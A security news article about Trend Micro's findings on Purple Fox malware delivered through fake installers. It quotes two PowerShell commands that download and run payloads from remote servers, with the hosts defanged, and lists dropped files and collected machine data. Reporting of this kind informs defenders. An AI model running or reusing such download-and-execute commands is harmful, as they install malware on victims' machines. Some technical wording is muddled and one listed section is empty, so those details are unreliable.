Friday, July 19, 2024

Malicious Telegram Messenger App Using New Purple Fox Malware to Hack PCs

The cybersecurity experts at Trend Micro have found a very suspicious activity of Purple Fox operators. This Purple Fox malware installs further malicious payloads on all the devices that are already infected or compromised.

The threat actors have noticed that the attacks generally take advantage of legitimate software for implementing malicious payloads. The vulnerability has been named CVE-2021-1732, and this vulnerability generally optimizes rootkit capabilities that are leveraged in their attacks.

Capabilities & Technical Analysis

In this attack, the threat actors have implemented some commands such as:-

  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//[[:]]17881/0CFA042F.Png”
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//[:]13405/57BC9B7E.Png’);MsiMake http[:]//[:]13405/0CFA042F.Png”

However, this kind of command helps the threat actor to download some malicious payloads in the affected devices that have been hosted on several compromised servers. 

The PurpleFox servers have been founded on some locations that we have mentioned below:-

  • China – 345
  • India – 34
  • Brazil – 29
  • The United States – 26
  • Others – 113

Targeted vulnerabilities

The vulnerabilities that are targeted or exploited:-

Files dropped

The cybersecurity experts have found some files that have been dropped onto the infected system:

  • Calldriver.exe
  • Driver.sys
  • dll.dll
  • kill.bat
  • speedmem2.hg 

Second & Third Exchange (Victim to C&C)

However, in the second key exchange, it has been noted that the messages are sent from the severe to the infected device of the client, and all of these were handled on the onReceive function.

In the third exchange, once the encrypted session is designated over the WebSocket, now the users have to put their fingerprint on the machine.

And all of this is done by extracting some definite information such as:-

  • Machine name
  • Local IP
  • MCA address
  • Windows version

This type of attack is quite hazardous and has a lot of impact on the infected device. After investigating the whole attack, the cybersecurity detected a large number of malicious installers that kept delivering the same Purple Fox rootkit version.

And threat actors do this by using a similar attack chain, and not only that even they also deliver emails through email; on the other side, there are some that have been suspected to be downloaded from phishing websites. 

So, as a recommendation, the client must stay alerted by this kind of attack as it puta a huge impact on the affected devices.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.


Latest articles

Hackers Claiming Dettol Data Breach: 453,646 users Impacted

A significant data breach has been reported by a threat actor known as 'Hana,'...

CrowdStrike Update Triggers Widespread Windows BSOD Crashes

A recent update from cybersecurity firm CrowdStrike has caused significant disruptions for Windows users,...

Operation Spincaster Disrupts Approval Phishing Technique that Drains Victim’s Wallets

Chainalysis has launched Operation Spincaster, an initiative to disrupt approval phishing scams that have...

Octo Tempest Know for Attacking VMWare ESXi Servers Added RansomHub & Qilin to Its Arsenal

Threat actors often attack VMware ESXi servers since they accommodate many virtual machines, which...

TAG-100 Actors Using Open-Source Tools To Attack Gov & Private Orgs

Hackers exploit open-source tools to execute attacks because they are readily available, well-documented, and...

macOS Users Beware Of Weaponized Meeting App From North Korean Hackers

Meeting apps are often targeted and turned into weapons by hackers as they are...

Hackers Exploiting Legitimate RMM Tools With BugSleep Malware

Since October 2023, MuddyWater, which is an Iranian threat group linked to MOIS, has...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Free Webinar

Low Rate DDoS Attack

9 of 10 sites on the AppTrana network have faced a DDoS attack in the last 30 days.
Some DDoS attacks could readily be blocked by rate-limiting, IP reputation checks and other basic mitigation methods.
More than 50% of the DDoS attacks are employing botnets to send slow DDoS attacks where millions of IPs are being employed to send one or two requests per minute..
Key takeaways include:

  • The mechanics of a low-DDoS attack
  • Fundamentals of behavioural AI and rate-limiting
  • Surgical mitigation actions to minimize false positives
  • Role of managed services in DDoS monitoring

Related Articles